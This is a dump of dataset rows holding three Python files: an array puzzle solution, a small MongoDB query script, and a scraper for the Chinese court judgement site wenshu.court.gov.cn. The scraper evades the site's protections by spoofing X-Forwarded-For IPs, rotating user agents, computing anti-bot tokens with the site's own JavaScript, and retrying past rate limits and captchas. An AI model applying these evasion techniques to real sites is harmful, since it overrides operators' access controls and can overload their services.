index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
22,000 | d6be610c82d30205676c8a425190cf2d54d96e65 | """
Maximum Unsorted Subarray
Problem Description
Given an array A of non-negative integers of size N. Find the minimum sub-array Al, Al+1 ,..., Ar such that if we sort(in ascending order) that sub-array, then the whole array should get sorted. If A is already sorted, output -1.
Problem Constraints
1 <= N <= 1000000
1 <= A[i] <= 1000000
Input Format
First and only argument is an array of non-negative integers of size N.
Output Format
Return an array of length 2 where First element denotes the starting index(0-based) and second element denotes the ending index(0-based) of the sub-array. If the array is already sorted, return an array containing only one element i.e. -1.
Example Input
Input 1:
A = [1, 3, 2, 4, 5]
Input 2:
A = [1, 2, 3, 4, 5]
Example Output
Output 1:
[1, 2]
Output 2:
[-1]
Example Explanation
Explanation 1:
If we sort the sub-array A1, A2, then the whole array A gets sorted.
Explanation 2:
A is already sorted.
"""
class Solution:
    # @param A : list of integers
    # @return a list of integers
    def subUnsort(self, A):
        """Return [l, r], the 0-based bounds of the smallest sub-array whose
        sorting would sort all of A, or [-1] if A is already sorted.

        Strategy: compare A against its sorted copy; the first and last
        positions where they disagree bound the sub-array that must move.
        """
        ordered = sorted(A)
        if ordered == A:
            return [-1]
        n = len(A)
        # first index (from the left) that is out of place
        start = next(i for i in range(n) if A[i] != ordered[i])
        # last index (from the right) that is out of place
        end = next(i for i in range(n - 1, -1, -1) if A[i] != ordered[i])
        return [start, end]
|
22,001 | 56185cf8a8f3b1e35095ef523340ca52fbb21097 | # Jared Asch
# Softdev2 pd06
# K06 -- Yummy Mongo Py
# 2019-03-01
import pymongo

# Address of the shared MongoDB server hosting the sample data set.
SERVER_IP = "142.93.202.60"

connection = pymongo.MongoClient(SERVER_IP)
db = connection.test
collection = db["primer-dataset"]


def findBorough(b):
    """Return every restaurant document located in borough *b*."""
    return [doc for doc in collection.find({"borough": b})]


def findZip(z):
    """Return every restaurant document with the given zip code *z*."""
    return [doc for doc in collection.find({"address.zip": z})]


def findZipGrade(zip, grade):
    """Return restaurants in *zip* whose most recent grade equals *grade*."""
    return [doc for doc in collection.find({"address.zip": zip, "grades.0.grade": grade})]


def findZipScore(zip, score):
    """Return restaurants in *zip* whose most recent score is below *score*."""
    return [doc for doc in collection.find({"address.zip": zip, "grades.0.score": {"$lt": score}})]


print(findBorough("Manhattan"))
print(findZip("10462"))
print(findZipGrade("10462", "A"))
print(findZipScore("10462", 10))
|
22,002 | f148cf0cdcab7616075a1e190f272a553dbc908b | # -*- coding: UTF-8 -*-
import execjs
import json
import logging
import random
import re
import requests
import time
import urllib
import FileOperations
class WenShu:
    """Scraper client for wenshu.court.gov.cn (China Judgements Online).

    Encapsulates session handling, the site's anti-scraping token dance
    (guid -> number -> vjkl5 cookie -> vl5x, the last computed by running
    the site's own JavaScript via execjs), captcha validation, and the
    retrieval of search-result pages and individual judgement documents.

    NOTE(review): relies on external files being present at runtime:
    'ua_list.json' plus 'sha1.js', 'md5.js', 'base64.js', 'vl5x.js'.
    """

    def __init__(self):
        # Init default parameters
        self.item_in_page = 20      # results requested per page
        self.case_brief = dict()    # last parsed page of case metadata
        # Init log
        self._init_log()
        self.session = requests.Session()
        # Init url list
        self.url_list = {'list_url': 'http://wenshu.court.gov.cn/list/list/',
                         'waf_captcha_url': 'http://wenshu.court.gov.cn/waf_captcha/',
                         'waf_verify_url': 'http://wenshu.court.gov.cn/waf_verify.htm',
                         'list_content_url': 'http://wenshu.court.gov.cn/List/ListContent',
                         'validate_code_url': 'http://wenshu.court.gov.cn/User/ValidateCode',
                         'check_visit_code_url': 'http://wenshu.court.gov.cn/Content/CheckVisitCode',
                         'create_code_url': 'http://wenshu.court.gov.cn/ValiCode/CreateCode/'
                         }
        # Init default header (randomized X-Forwarded-For to vary the apparent origin)
        self.headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:53.0) Gecko/20100101 Firefox/53.0',
            'X-Forwarded-For': '{}.{}.{}.{},153.88.176.160'.format(random.randint(1, 254),
                                                                   random.randint(1, 254),
                                                                   random.randint(1, 254),
                                                                   random.randint(1, 254))
        }
        # Browser-like headers for plain GET navigation requests
        self.headers1 = {
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
            "Accept-Encoding": "gzip, deflate",
            "Accept-Language": "zh-CN,zh;q=0.8",
            "Host": "wenshu.court.gov.cn",
            "Proxy-Connection": "keep-alive",
            "Upgrade-Insecure-Requests": "1",
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36"
        }
        # XHR-style headers for form POSTs against the JSON endpoints
        self.headers2 = {
            "Accept": "*/*",
            "Accept-Encoding": "gzip, deflate",
            "Accept-Language": "zh-CN,zh;q=0.8",
            "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
            "Host": "wenshu.court.gov.cn",
            "Origin": "http://wenshu.court.gov.cn",
            "Proxy-Connection": "keep-alive",
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36",
            "X-Requested-With": "XMLHttpRequest"
        }
        # Load ua list and pick one random UA shared by both header sets
        with open('ua_list.json', 'r') as f:
            self.ua_list = json.load(f)
        ua = random.choice(self.ua_list)
        self.headers1['User-Agent'] = ua
        self.headers2['User-Agent'] = ua
        # Init default session
        # self.sess, self.vl5x = self.get_sess()

    def __str__(self):
        return self.__class__.__name__

    def _init_log(self):
        """Configure a root logger with an INFO-level console handler."""
        # Create logger
        self.logger = logging.getLogger()
        self.logger.setLevel(logging.DEBUG)
        # create console handler and set level to debug
        self.ch = logging.StreamHandler()
        self.ch.setLevel(logging.INFO)
        # create formatter
        formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
        # add formatter to ch
        self.ch.setFormatter(formatter)
        # add ch to logger
        self.logger.addHandler(self.ch)

    def __del__(self):
        # Detach our handler so repeated instantiation doesn't duplicate output
        self.logger.removeHandler(self.ch)

    def set_search_criteria(self, search_criteria):
        """Store the search expression used by all subsequent page fetches."""
        self.logger.info("Set search criteria to {}".format(search_criteria))
        self.search_criteria = search_criteria

    def get_total_item_number(self):
        """Fetch page 1 and return the total result count, or None on failure."""
        self.logger.info("Get total case number of {}".format(self.search_criteria))
        raw = self.load_page(1)
        self.logger.debug(raw)
        total_number = re.search('"Count":"([0-9]+)"', raw)
        if total_number:
            self.logger.info("total item of {} is {}".format(self.search_criteria, total_number.group(1)))
            return int(total_number.group(1))
        else:
            self.logger.info("Failed to found total item of {}".format(self.search_criteria))
            return None

    def get_guid(self):
        """Generate the request guid by running the site's own JS routine."""
        self.logger.info("Get guid...")
        # Build the guid parameter exactly like the site's client-side script
        js1 = '''
        function getGuid() {
        var guid = createGuid() + createGuid() + "-" + createGuid() + "-" + createGuid() + createGuid() + "-" + createGuid() + createGuid() + createGuid(); //CreateGuid();
        return guid;
        }
        var createGuid = function () {
        return (((1 + Math.random()) * 0x10000) | 0).toString(16).substring(1);
        }
        '''
        ctx1 = execjs.compile(js1)
        guid = (ctx1.call("getGuid"))
        self.logger.info("Guid is {}".format(guid))
        return guid

    def get_number(self, guid):
        """POST the guid to obtain the 8-character "number" token; retries until valid."""
        self.logger.info("Get number...")
        # Request the "number" token for this guid
        code_url = "http://wenshu.court.gov.cn/ValiCode/GetCode"
        data = {
            'guid': guid
        }
        headers = self.headers1
        while True:
            req1 = self.session.post(code_url, headers=headers, data=data)
            number = req1.text
            self.logger.info("Number is {}".format(number))
            # A valid token is exactly 8 characters long
            if len(number) == 8:
                break
            else:
                self.logger.info("Invalid number, sleep 10s and retry")
                time.sleep(10)
        return number

    def get_vjkl5(self, guid, number):
        """GET the list page and return the vjkl5 anti-scraping cookie."""
        self.logger.info("Get vjkl5...")
        # Read the vjkl5 value from the response cookie
        url = "http://wenshu.court.gov.cn/list/list/?sorttype=1&number=" + number \
              + "&guid=" + guid \
              + "&conditions=searchWord+QWJS+++" + urllib.parse.quote(self.search_criteria)
        headers = self.headers1
        while True:
            req1 = self.session.get(url=url, headers=headers)
            self.logger.debug(f"req1 is {req1}")
            if req1.status_code == 200:
                vjkl5 = req1.cookies["vjkl5"]
                break
            else:
                self.logger.info(f"Get vjkl5 failed. Sleep 10s and retry")
                time.sleep(10)
        self.logger.debug(f"vjkl5 is {vjkl5}")
        return vjkl5

    def get_vl5x(self, vjkl5):
        """Derive the vl5x request parameter from vjkl5 via the site's JS."""
        self.logger.info("Get vl5x...")
        #p = execjs.compile(jswenshu.base_64 + jswenshu.sha1 + jswenshu.md5 + jswenshu.js_strToLong + jswenshu.js)
        #strlength = p.call('strToLong', vjkl5)
        #funcIndex = strlength % 200
        #func_s = 'makeKey_' + str(funcIndex)
        #vl5x = p.call(func_s, vjkl5)
        #self.logger.debug("vl5x is {}".format(vl5x))
        #return vl5x
        # Concatenate the site's hashing scripts and evaluate vl5x(vjkl5)
        js = ""
        fp1 = open('./sha1.js')
        js += fp1.read()
        fp1.close()
        fp2 = open('./md5.js')
        js += fp2.read()
        fp2.close()
        fp3 = open('./base64.js')
        js += fp3.read()
        fp3.close()
        fp4 = open('./vl5x.js')
        js += fp4.read()
        fp4.close()
        ctx2 = execjs.compile(js)
        vl5x = (ctx2.call('vl5x', vjkl5))
        self.logger.debug("vl5x is {}".format(vl5x))
        return vl5x

    def get_valid_code(self):
        """Interactively solve the rate-limit captcha and submit it."""
        # Triggered when the cookie has been used too many times (rate limited)
        headers = self.headers2
        #sess, vl5x = getSess()
        #ua = random.choice(ua_list)
        remind_captcha = self.session.get('http://wenshu.court.gov.cn/User/ValidateCode', headers=headers)
        with open('captcha.jpg', 'wb') as f:
            f.write(remind_captcha.content)
        #img = retrive_img(remind_captcha)
        # Manual step: the operator reads captcha.jpg and types the code
        captcha = input("What's the code:")
        captcha_data = {
            'ValidateCode': captcha
        }
        self.session.post('http://wenshu.court.gov.cn/Content/CheckVisitCode', headers=headers, data=captcha_data)
        print('getFirstPage response content is remind retry again')

    def _get_court_list(self, data):
        """POST *data* to the court-tree endpoint and return child court names."""
        headers = self.headers2
        headers['User-Agent'] = random.choice(self.ua_list)
        r = self.session.post('http://wenshu.court.gov.cn/List/CourtTreeContent', headers=headers, data=data)
        # The endpoint returns JSON wrapped in a JSON string, hence the double decode
        data = json.loads(r.json())
        court_list = [ c['Key'] for c in data[0]['Child'] if c['Key'] ]
        return court_list

    def get_mid_court_list(self, region):
        """Return the intermediate courts under the given region."""
        data = {
            # e.g. Param = "法院地域:四川省" (court region, e.g. Sichuan)
            "Param": "法院地域:" + region,
            "parval": region
        }
        return self._get_court_list(data)

    def get_court_list(self, mid_court):
        """Return the basic-level courts under the given intermediate court."""
        data = {
            "Param": "中级法院:" + mid_court,
            "parval": mid_court
        }
        return self._get_court_list(data)

    def load_page(self, index):
        """Fetch one page of search results (1-based *index*); retries until success.

        Re-acquires the full guid/number/vjkl5/vl5x token chain on every
        attempt, and falls back to captcha validation when the server
        answers with the 'remind'/'remind key' sentinels.
        """
        while True:
            guid = self.get_guid()
            number = self.get_number(guid)
            vjkl5 = self.get_vjkl5(guid, number)
            vl5x = self.get_vl5x(vjkl5)
            headers = self.headers2
            headers['User-Agent'] = random.choice(self.ua_list)
            # Fetch the result page
            url = self.url_list['list_content_url']
            data = {
                "Param": self.search_criteria,
                "Index": index,
                "Page": self.item_in_page,
                "Order": "法院层级",
                "Direction": "asc",
                "vl5x": vl5x,
                "number": number,
                "guid": guid
            }
            try:
                # NOTE(review): the payload is sent via params= (query string),
                # not data= (form body), despite this being a POST — confirm
                # the endpoint accepts it; the older commented-out variant used data=.
                r = self.session.post(url=url, headers=headers, params=data)
                # self.logger.debug(data)
                if r.status_code == 302:
                    # Redirected to the captcha wall: start over with a fresh session
                    self.session = requests.Session()
                    continue
                if r.status_code >= 500:
                    self.logger.info('the service is bad and response_status_code is {}, wait one minute retry'.format(
                        r.status_code))
                    time.sleep(60)
                    continue
                # Deserialize the returned payload
                data_unicode = json.loads(r.text)
                self.logger.debug('Response is {}'.format(data_unicode))
                # data_json = response.json()
                if data_unicode == u'remind key':
                    # Cookie expired
                    self.logger.info('get_page response content is remind key retry again, sleep 10s...')
                    #self.session = requests.Session()
                    #self.get_valid_code()
                    time.sleep(10)
                    self.validate_page()
                    continue
                elif data_unicode == u'remind':
                    self.logger.info('get_page response content is remind retry again')
                    time.sleep(10)
                    self.validate_page()
                    continue
                else:
                    return data_unicode
            except Exception as e:
                # Best-effort loop: log and retry on any network/parse error
                self.logger.info(e)

    def validate_page(self):
        """Download the captcha image, ask the operator to solve it, and submit."""
        headers = self.headers1
        url = "http://wenshu.court.gov.cn/User/ValidateCode"
        url2 = "http://wenshu.court.gov.cn/Content/CheckVisitCode"
        r = self.session.get(url=url, headers=headers)
        img = FileOperations.MyImageFile('v.jpg')
        img.write(r.content)
        # NOTE(review): MyImageFile.read() presumably blocks for a human-entered
        # answer or OCR result — confirm in FileOperations
        v_code = img.read()
        self.logger.debug("Validation code is {}".format(v_code))
        data = {
            'ValidateCode': v_code
        }
        r2 = self.session.post(url=url2, headers=headers, data=data)
        self.logger.debug("Response of check visit code is {}".format(r2.text))

    def get_case(self, id):
        """Download one judgement document by DocID and return its plain text.

        Returns None when the document markup cannot be parsed.
        """
        # http://wenshu.court.gov.cn/content/content?DocID=
        headers = self.headers1
        # Fetch the document content
        url = 'http://wenshu.court.gov.cn/content/content?DocID=' + id
        url2 = "http://wenshu.court.gov.cn/CreateContentJS/CreateContentJS.aspx?DocID=" + id
        while True:
            try:
                r = self.session.get(url=url2, headers=headers)
                if "VisitRemind" in r.text:
                    # Captcha wall: validate and try again
                    self.validate_page()
                    continue
                else:
                    break
            except Exception as e:
                self.logger.debug("{}".format(e))
                continue
        #raw = self.session.post(url=url2, headers=headers)
        # self.logger.debug("Response.text is {}".format(r.text))
        # Grab the markup span holding the judgement body
        raw = re.search('<a.*div>', r.text)
        # self.logger.debug("raw string is {}".format(raw.group()))
        try:
            # Strip all HTML tags, leaving the raw text
            text_data = re.sub('<.*?>', '', raw.group())
            self.logger.debug("text is {}".format(text_data))
        except Exception as e:
            self.logger.debug("Response text is {}".format(r.text))
            return None
        return text_data.replace(" ", "")

    def get_case_package(self, name_list, id_list, date_list):
        """Assemble the 'docIds' string used by the site's bulk-download endpoint.

        NOTE(review): the actual download request is still commented out below;
        this currently only builds and logs the identifier string.
        """
        docIds = ''
        for c in range(len(name_list)):
            docIds += id_list[c] + '|' + name_list[c] + '|' + date_list[c] + ','
        docIds = docIds[:-1]
        self.logger.debug("Doc id used for download zip package is {}".format(docIds))
        # print(docIds)
        # condition = urllib.parse.quote(self.download_conditions)
        # data = {'conditions': condition, 'docIds': docIds, 'keyCode': ''}
        # print("Downloading case %s" % (name_list))
        # r = requests.post(self.download_url, headers=self.headers, data=data)
        # if r.status_code != 200:
        #     print(r.status_code)
        # else:
        #     self.doc_content = r.content
        #

    # index selects which page to fetch; page 1 also carries the total document count
    def get_case_list(self, index):
        """Fetch page *index* and extract per-case metadata into self.case_brief."""
        # Field patterns keyed on the Chinese JSON field names:
        # 案件名称=case name, 文书ID=document id, 裁判日期=judgement date,
        # 案号=docket number, 审判程序=trial procedure, 法院名称=court name
        pattern_name = re.compile('"案件名称":"(.*?)"', re.S)
        pattern_id = re.compile('"文书ID":"(.*?)"', re.S)
        pattern_date = re.compile('"裁判日期":"(.*?)"', re.S)
        pattern_case_id = re.compile('"案号":"(.*?)"', re.S)
        # pattern_brief = re.compile('"裁判要旨段原文":"(.*?)"', re.S)
        pattern_procedure = re.compile('"审判程序":"(.*?)"', re.S)
        pattern_court = re.compile('"法院名称":"(.*?)"', re.S)
        self.logger.info("Get case list on page {}".format(index))
        while True:
            raw = self.load_page(index)
            self.case_brief = dict()
            self.case_brief['name'] = re.findall(pattern_name, raw)
            self.case_brief['doc_id'] = re.findall(pattern_id, raw)
            self.case_brief['date'] = re.findall(pattern_date, raw)
            self.case_brief['case_id'] = re.findall(pattern_case_id, raw)
            # self.case_brief['brief'] = re.findall(pattern_brief, raw)
            self.case_brief['procedure'] = re.findall(pattern_procedure, raw)
            self.case_brief['court'] = re.findall(pattern_court, raw)
            # One 'N' (not yet downloaded) flag per case
            self.case_brief['download'] = 'N' * len(self.case_brief['name'])
            # if self.case_brief['download'] != '':
            #     self.logger.debug("Get case list {} on page {}".format(self.case_brief['name'], index))
            #     break
            # else:
            #     self.logger.info("Get empty page, try it 10 seconds later.")
            #     time.sleep(10)
            return self.case_brief
def main():
    """Placeholder entry point; the module is meant to be imported."""
    pass


if __name__ == "__main__":
    main()
# def get_sess(self):
# sess = requests.Session()
# # 获取form表单的参数
# post = execjs.compile("""
# var hexcase = 0;
# var b64pad = "";
# var chrsz = 8;
# function hex_md5(s){ return binl2hex(core_md5(str2binl(s), s.length * chrsz));}
# function b64_md5(s){ return binl2b64(core_md5(str2binl(s), s.length * chrsz));}
# function str_md5(s){ return binl2str(core_md5(str2binl(s), s.length * chrsz));}
# function hex_hmac_md5(key, data) { return binl2hex(core_hmac_md5(key, data)); }
# function b64_hmac_md5(key, data) { return binl2b64(core_hmac_md5(key, data)); }
# function str_hmac_md5(key, data) { return binl2str(core_hmac_md5(key, data)); }
#
# function md5_vm_test()
# {
# return hex_md5("abc") == "900150983cd24fb0d6963f7d28e17f72";
# }
#
# function core_md5(x, len)
# {
# x[len >> 5] |= 0x80 << ((len) % 32);
# x[(((len + 64) >>> 9) << 4) + 14] = len;
#
# var a = 1732584193;
# var b = -271733879;
# var c = -1732584194;
# var d = 271733878;
#
# for(var i = 0; i < x.length; i += 16)
# {
# var olda = a;
# var oldb = b;
# var oldc = c;
# var oldd = d;
#
# a = md5_ff(a, b, c, d, x[i+ 0], 7 , -680876936);
# d = md5_ff(d, a, b, c, x[i+ 1], 12, -389564586);
# c = md5_ff(c, d, a, b, x[i+ 2], 17, 606105819);
# b = md5_ff(b, c, d, a, x[i+ 3], 22, -1044525330);
# a = md5_ff(a, b, c, d, x[i+ 4], 7 , -176418897);
# d = md5_ff(d, a, b, c, x[i+ 5], 12, 1200080426);
# c = md5_ff(c, d, a, b, x[i+ 6], 17, -1473231341);
# b = md5_ff(b, c, d, a, x[i+ 7], 22, -45705983);
# a = md5_ff(a, b, c, d, x[i+ 8], 7 , 1770035416);
# d = md5_ff(d, a, b, c, x[i+ 9], 12, -1958414417);
# c = md5_ff(c, d, a, b, x[i+10], 17, -42063);
# b = md5_ff(b, c, d, a, x[i+11], 22, -1990404162);
# a = md5_ff(a, b, c, d, x[i+12], 7 , 1804603682);
# d = md5_ff(d, a, b, c, x[i+13], 12, -40341101);
# c = md5_ff(c, d, a, b, x[i+14], 17, -1502002290);
# b = md5_ff(b, c, d, a, x[i+15], 22, 1236535329);
#
# a = md5_gg(a, b, c, d, x[i+ 1], 5 , -165796510);
# d = md5_gg(d, a, b, c, x[i+ 6], 9 , -1069501632);
# c = md5_gg(c, d, a, b, x[i+11], 14, 643717713);
# b = md5_gg(b, c, d, a, x[i+ 0], 20, -373897302);
# a = md5_gg(a, b, c, d, x[i+ 5], 5 , -701558691);
# d = md5_gg(d, a, b, c, x[i+10], 9 , 38016083);
# c = md5_gg(c, d, a, b, x[i+15], 14, -660478335);
# b = md5_gg(b, c, d, a, x[i+ 4], 20, -405537848);
# a = md5_gg(a, b, c, d, x[i+ 9], 5 , 568446438);
# d = md5_gg(d, a, b, c, x[i+14], 9 , -1019803690);
# c = md5_gg(c, d, a, b, x[i+ 3], 14, -187363961);
# b = md5_gg(b, c, d, a, x[i+ 8], 20, 1163531501);
# a = md5_gg(a, b, c, d, x[i+13], 5 , -1444681467);
# d = md5_gg(d, a, b, c, x[i+ 2], 9 , -51403784);
# c = md5_gg(c, d, a, b, x[i+ 7], 14, 1735328473);
# b = md5_gg(b, c, d, a, x[i+12], 20, -1926607734);
#
# a = md5_hh(a, b, c, d, x[i+ 5], 4 , -378558);
# d = md5_hh(d, a, b, c, x[i+ 8], 11, -2022574463);
# c = md5_hh(c, d, a, b, x[i+11], 16, 1839030562);
# b = md5_hh(b, c, d, a, x[i+14], 23, -35309556);
# a = md5_hh(a, b, c, d, x[i+ 1], 4 , -1530992060);
# d = md5_hh(d, a, b, c, x[i+ 4], 11, 1272893353);
# c = md5_hh(c, d, a, b, x[i+ 7], 16, -155497632);
# b = md5_hh(b, c, d, a, x[i+10], 23, -1094730640);
# a = md5_hh(a, b, c, d, x[i+13], 4 , 681279174);
# d = md5_hh(d, a, b, c, x[i+ 0], 11, -358537222);
# c = md5_hh(c, d, a, b, x[i+ 3], 16, -722521979);
# b = md5_hh(b, c, d, a, x[i+ 6], 23, 76029189);
# a = md5_hh(a, b, c, d, x[i+ 9], 4 , -640364487);
# d = md5_hh(d, a, b, c, x[i+12], 11, -421815835);
# c = md5_hh(c, d, a, b, x[i+15], 16, 530742520);
# b = md5_hh(b, c, d, a, x[i+ 2], 23, -995338651);
#
# a = md5_ii(a, b, c, d, x[i+ 0], 6 , -198630844);
# d = md5_ii(d, a, b, c, x[i+ 7], 10, 1126891415);
# c = md5_ii(c, d, a, b, x[i+14], 15, -1416354905);
# b = md5_ii(b, c, d, a, x[i+ 5], 21, -57434055);
# a = md5_ii(a, b, c, d, x[i+12], 6 , 1700485571);
# d = md5_ii(d, a, b, c, x[i+ 3], 10, -1894986606);
# c = md5_ii(c, d, a, b, x[i+10], 15, -1051523);
# b = md5_ii(b, c, d, a, x[i+ 1], 21, -2054922799);
# a = md5_ii(a, b, c, d, x[i+ 8], 6 , 1873313359);
# d = md5_ii(d, a, b, c, x[i+15], 10, -30611744);
# c = md5_ii(c, d, a, b, x[i+ 6], 15, -1560198380);
# b = md5_ii(b, c, d, a, x[i+13], 21, 1309151649);
# a = md5_ii(a, b, c, d, x[i+ 4], 6 , -145523070);
# d = md5_ii(d, a, b, c, x[i+11], 10, -1120210379);
# c = md5_ii(c, d, a, b, x[i+ 2], 15, 718787259);
# b = md5_ii(b, c, d, a, x[i+ 9], 21, -343485551);
#
# a = safe_add(a, olda);
# b = safe_add(b, oldb);
# c = safe_add(c, oldc);
# d = safe_add(d, oldd);
# }
# return Array(a, b, c, d);
#
# }
#
# function md5_cmn(q, a, b, x, s, t)
# {
# return safe_add(bit_rol(safe_add(safe_add(a, q), safe_add(x, t)), s),b);
# }
# function md5_ff(a, b, c, d, x, s, t)
# {
# return md5_cmn((b & c) | ((~b) & d), a, b, x, s, t);
# }
# function md5_gg(a, b, c, d, x, s, t)
# {
# return md5_cmn((b & d) | (c & (~d)), a, b, x, s, t);
# }
# function md5_hh(a, b, c, d, x, s, t)
# {
# return md5_cmn(b ^ c ^ d, a, b, x, s, t);
# }
# function md5_ii(a, b, c, d, x, s, t)
# {
# return md5_cmn(c ^ (b | (~d)), a, b, x, s, t);
# }
# function core_hmac_md5(key, data)
# {
# var bkey = str2binl(key);
# if(bkey.length > 16) bkey = core_md5(bkey, key.length * chrsz);
#
# var ipad = Array(16), opad = Array(16);
# for(var i = 0; i < 16; i++)
# {
# ipad[i] = bkey[i] ^ 0x36363636;
# opad[i] = bkey[i] ^ 0x5C5C5C5C;
# }
#
# var hash = core_md5(ipad.concat(str2binl(data)), 512 + data.length * chrsz);
# return core_md5(opad.concat(hash), 512 + 128);
# }
#
# function safe_add(x, y)
# {
# var lsw = (x & 0xFFFF) + (y & 0xFFFF);
# var msw = (x >> 16) + (y >> 16) + (lsw >> 16);
# return (msw << 16) | (lsw & 0xFFFF);
# }
#
# function bit_rol(num, cnt)
# {
# return (num << cnt) | (num >>> (32 - cnt));
# }
#
# function str2binl(str)
# {
# var bin = Array();
# var mask = (1 << chrsz) - 1;
# for(var i = 0; i < str.length * chrsz; i += chrsz)
# bin[i>>5] |= (str.charCodeAt(i / chrsz) & mask) << (i%32);
# return bin;
# }
#
# function binl2str(bin)
# {
# var str = "";
# var mask = (1 << chrsz) - 1;
# for(var i = 0; i < bin.length * 32; i += chrsz)
# str += String.fromCharCode((bin[i>>5] >>> (i % 32)) & mask);
# return str;
# }
#
# function binl2hex(binarray)
# {
# var hex_tab = hexcase ? "0123456789ABCDEF" : "0123456789abcdef";
# var str = "";
# for(var i = 0; i < binarray.length * 4; i++)
# {
# str += hex_tab.charAt((binarray[i>>2] >> ((i%4)*8+4)) & 0xF) +
# hex_tab.charAt((binarray[i>>2] >> ((i%4)*8 )) & 0xF);
# }
# return str;
# }
#
# function binl2b64(binarray)
# {
# var tab = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
# var str = "";
# for(var i = 0; i < binarray.length * 4; i += 3)
# {
# var triplet = (((binarray[i >> 2] >> 8 * ( i %4)) & 0xFF) << 16)
# | (((binarray[i+1 >> 2] >> 8 * ((i+1)%4)) & 0xFF) << 8 )
# | ((binarray[i+2 >> 2] >> 8 * ((i+2)%4)) & 0xFF);
# for(var j = 0; j < 4; j++)
# {
# if(i * 8 + j * 6 > binarray.length * 32) str += b64pad;
# else str += tab.charAt((triplet >> 6*(3-j)) & 0x3F);
# }
# }
# return str;
# }
#
# function hex_md5(s){ return binl2hex(core_md5(str2binl(s), s.length * chrsz));}
#
# function getKey(vjkl5){
# var i=25-10-8-2;
# var c=vjkl5;
# var str=c.substr(i,i*5)+c.substr((i+1)*(i+1),3);
# var a=str.substr(i)+str.substr(-4);
# var b=str.substr(4)+a.substr(-i-1);
# c=hex_md5(str).substr(i-1,24);
# return c
# }
#
# """)
# # 当网站访问量过大时 会有302重定向到验证码页面 需要输入验证码 获取session
# while True:
# try:
# response = sess.get(self.url_list['list_url'],
# headers=self.header,
# allow_redirects=False)
# self.logger.debug("Response status code is {}".format(response.status_code))
# if response.status_code == 200:
# vjkl5 = response.cookies.get_dict()['vjkl5']
# vl5x = post.call('getKey', vjkl5)
# self.logger.debug("vjkl5 is %s and vl5x is %s" % (vjkl5, vl5x))
# return sess, vl5x
# if response.status_code == 503:
# # 服务器出现问题
# self.logger.debug('the service is bad and response_status_code is {}, wait one minute retry'.format(
# response.status_code))
# time.sleep(60)
# continue
# if response.status_code == 302:
# while True:
# # 302重定向 需要输入验证码
# home_yzm = sess.get(self.url_list['waf_captcha_url'],
# headers=headers,
# allow_redirects=False,
# timeout=10)
# if home_yzm.status_code >= 500:
# # 服务器出现问题
# self.logger.debug(
# 'the service is bad and response_status_code is {}, wait one minute retry'.format(
# response.status_code))
# time.sleep(60)
# continue
# with open('captcha.jpg', 'wb') as f:
# f.write(home_yzm.content)
# # captcha = result_captcha('captcha.jpg')
# # TODO: Get code automatically
# captcha = input("Enter code: ")
# verify_response = sess.get(self.url['waf_verify_url'] + '?captcha={}'.format(captcha),
# headers=headers,
# allow_redirects=False)
# try:
# value = verify_response.cookies.get_dict()['wafverify']
# except Exception as e:
# # 验证码输入出错 response没有wafverify字段 重试
# self.logger.debug(e)
# continue
# vjkl5 = sess.cookies.get_dict()['vjkl5']
# vl5x = post.call('getKey', vjkl5)
# return sess, vl5x
# except Exception as e:
# self.logger.debug(e)
# continue
# def get_page(self, index=1):
# i = 0
# while i < 5:
# # captcha, guid = self.get_captcha() # 每次请求都要用到
# guid = self.get_guid()
# number = self.get_number(guid)
# self.logger.debug("guid: {}, number: {}".format(guid, number))
#
# form_data = {
# 'Param': self.search_criteria,
# 'Index': index,
# 'Page': 20,
# 'Order': '法院层级',
# 'Direction': 'asc',
# 'vl5x': self.vl5x,
# 'number': number,
# 'guid': guid
# }
# try:
# header = self.header
# header['User-Agent'] = random.choice(self.ua_list)
# response = self.sess.post(self.url_list['list_content_url'], headers=header, data=form_data)
# if response.status_code == 302:
# self.sess, self.vl5x = self.get_sess()
# continue
# if response.status_code >= 500:
# self.logger.info('the service is bad and response_status_code is {}, wait one minute retry'.format(
# response.status_code))
# time.sleep(60)
# continue
# # 返回的数据进行序列化
# data_unicode = json.loads(response.text)
# self.logger.debug('Response is {}'.format(data_unicode))
# # data_json = response.json()
#
# if data_unicode == u'remind key':
# # cookie 到期
# self.logger.info('get_page response content is remind key retry again')
# self.sess, self.vl5x = self.get_sess()
# continue
# elif data_unicode == u'remind':
# # cookie访问次数过多
# self.sess, self.vl5x = self.get_sess()
# ua = random.choice(self.ua_list)
# remind_captcha = self.sess.get(self.url_list['validate_code_url'], headers=header)
# img = retrive_img(remind_captcha)
# img = process_img(img)
# captcha = recognize(img)
# captcha_data = {
# 'ValidateCode': captcha
# }
# sess.post(self.url_list['check_visit_code_url'], headers=header, data=captcha_data)
# print('get_first_page response content is remind retry again')
# continue
# else:
# # return data_unicode
# return data_json
# # 每一页的docID
# id_list = re.findall(u'''.*?"文书ID\\":\\"(.*?)\\",''', data_unicode)
# # count是根据条件condition 筛选出来的总文档数 根据count决定要爬多少页
# data_list = json.loads(data_unicode)
# if len(data_list) == 0:
# time.sleep(2)
# print('getFirstPage response content is [] retry again')
# continue
# count = data_list[0]['Count']
# count = int(count)
# return count, id_list
# except Exception as e:
# print(e)
# i += 1
# if i == 5:
# # message = anyou + ': ' + str(index) + str(e) + ' ' + 'is bad'
# # logger.error(message)
# # print(message)
# return '', ''
# def get_first_page(self):
# # return self.get_page(1)
# return self.load_page(1)
# def get_captcha(self):
# while True:
# try:
# # 获取验证码 发送验证码 验证guid
# yzm = execjs.compile('''
# function createGuid() {
# return (((1 + Math.random()) * 0x10000) | 0).toString(16).substring(1);
# }
# function ref() {
# var guid = createGuid() + createGuid() + "-" + createGuid() + "-" + createGuid() + createGuid() + "-" + createGuid() + createGuid() + createGuid(); //CreateGuid();
# return guid;
# }
# ''')
